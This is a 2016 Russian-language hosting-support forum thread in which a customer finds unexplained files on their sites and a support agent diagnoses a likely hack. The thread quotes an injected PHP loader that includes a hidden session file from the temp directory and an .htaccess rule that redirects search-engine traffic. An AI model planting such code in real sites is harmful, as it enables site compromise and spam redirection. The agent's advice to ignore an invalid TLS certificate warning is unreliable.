Мы используем cookie-файлы
Для оптимизации работы нашего сайта мы используем cookie-файлы. Продолжая использовать сайт, Вы соглашаетесь с использованием cookie-файлов.
  • UAH
  • USD
  • RUB
  • EUR
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепр
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 170-15-42  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 630-90-82  MTC
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

Хостинг. появились файлы непонятные

Форумы Хостинг появились файлы непонятные
itradestorez
07.09.2016
хостинг: есть
домен: есть
появились файлы непонятные
здравствуйте, во всех сайтах появились такие файлы

что с ними делать?) причем созданы они явно давно, но стали отображаться на днях
Прикрепленные файлы:
Илья
07.09.2016
хостинг: есть
домен: есть
Приведите пример исходного кода файла index.php, возможно это вирус на сайте
itradestorez
07.09.2016
хостинг: есть
домен: есть
<?php error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?>
itradestorez
07.09.2016
хостинг: есть
домен: есть
htaccess

<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>
Илья
07.09.2016
хостинг: есть
домен: есть
Смотрите дату создания файла и ищите в логах по этому времени и дате запросы, которые приходили на Ваш сайт. Скорее всего это хакерская атака.
itradestorez
07.09.2016
хостинг: есть
домен: есть
Вроде бы не вредоносные файлы, они появились сегодня

Возможно у вас было какое-то обновление, и технические файлы из скрытых стали открыты для чтение через ftp?
Прикрепленные файлы:
Илья
08.09.2016
хостинг: есть
домен: есть
Вроде бы не вредоносные файлы, они появились сегодня во всех четырех хостинг аккаунтах © itradestorez

Наш антивирус не обнаруживает 100% вирусов, любой файл может быть результатом взлома, исходный код там очень странный, так как он подключает данные из сессии.
itradestorez
09.09.2016
хостинг: есть
домен: есть
посоветуйте пожалуйста чем лучше проверить тотально все хостинги?

файлы эти я удалил, все работает как и прежде, ничего не отвалилось, значит они были не системные и появились непонятно откуда
itradestorez
09.09.2016
хостинг: есть
домен: есть
пытаюсь перевести все подключения на FTP + TSL/SSL пишет что сертификат invalid

если нажать continue то подключение проходит, но оно получается не защищено?

по SFTP вообще не захотел подключатся хотя и порт менял на 22 (или надо другой какой-то?)
Илья
09.09.2016
хостинг: есть
домен: есть
пытаюсь перевести все подключения на FTP + TSL/SSL пишет что сертификат invalid © itradestorez

Подключение зашифровано, все ок. Не стоит обращать внимание на это предупреждение.
Илья
09.09.2016
хостинг: есть
домен: есть
посоветуйте пожалуйста чем лучше проверить тотально все хостинги? © itradestorez

Только ручками, универсального антивируса для php кода нет. Нужно проделывать то, что я описал в начале темы.
Скорее всего через уязвимость в CMS залили какой-то shell, но он оказался нерабочим, так как у нас на хостинге не стандартное размещение папок и нет public_html и прочих директорий.
itradestorez
09.09.2016
хостинг: есть
домен: есть
Спасибо за консультацию, будем поглядеть что будет дальше, ручками искать не вариант, десятки тысяч файлов :(
Илья
09.09.2016
хостинг: есть
домен: есть
Спасибо за консультацию, будем поглядеть что будет дальше, ручками искать не вариант, десятки тысяч файлов :( © itradestorez

Хоть миллион, по дате и точному времени создания вирусного файла находите запрос в логах, и видите откуда он прилетел.
Если повториться - напишите на форуме, я посмотрю.
itradestorez
10.09.2016
хостинг: есть
домен: есть
не знаю как в личку скинуть, в общем сайт mariavasilenko.ru весь в этих файлах непонятных и сегодня обнаружил порнотрафик на сайт

хотя если из поиска перейти на эту страницу, то никакого адалта там нет, странно

я уверен на 100% проблема идет с этого сайта, но как найти где именно этот вирус среди 1000 php файлов :(
Участвовать в общении на этом форуме могут только
зарегистрированные пользователи.

Если вы уже зарегистрированы Вам необходимо войти на форум.

Горячая линия
(044)
392 74 33
другие города